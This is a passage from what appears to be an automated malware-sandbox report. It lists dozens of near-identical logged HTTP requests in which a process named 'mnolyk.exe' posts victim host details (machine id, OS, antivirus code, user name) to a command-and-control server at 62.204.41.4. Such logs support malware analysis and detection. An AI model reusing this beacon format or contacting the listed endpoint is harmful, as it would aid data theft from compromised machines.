                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      282192.168.2.75000962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:16.756198883 CET735OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:16.821732044 CET735INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      283192.168.2.75001062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:17.037592888 CET736OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.105997086 CET736INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      284192.168.2.75001162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:17.285007000 CET737OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.352391958 CET737INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      285192.168.2.75001262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:17.535419941 CET738OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.602504969 CET738INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      286192.168.2.75001362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:17.791987896 CET739OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:17.858150005 CET739INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      287192.168.2.75001462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:18.030709982 CET740OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.095983982 CET740INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      288192.168.2.75001562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:18.281532049 CET741OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.347068071 CET741INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      289192.168.2.75001662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:18.532773972 CET742OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.598366022 CET742INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      29192.168.2.74975362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:04.648624897 CET461OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.715003014 CET461INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      290192.168.2.75001762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:18.799280882 CET743OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:18.864867926 CET743INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      291192.168.2.75001862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:19.057348967 CET744OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.123569012 CET744INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      292192.168.2.75001962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:19.314760923 CET745OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.379559040 CET745INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      293192.168.2.75002062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:19.544836998 CET746OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.609977961 CET746INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      294192.168.2.75002162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:19.783406973 CET747OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:19.847878933 CET747INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      295192.168.2.75002262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:20.029901028 CET748OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.095199108 CET748INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      296192.168.2.75002362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:20.267374039 CET749OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.332250118 CET749INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      297192.168.2.75002462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:20.506098032 CET750OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.569529057 CET750INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      298192.168.2.75002562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:20.761388063 CET751OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:20.828367949 CET751INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      299192.168.2.75002662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:21.007242918 CET752OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:21.075069904 CET752INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.74972762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:56.731344938 CET434OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
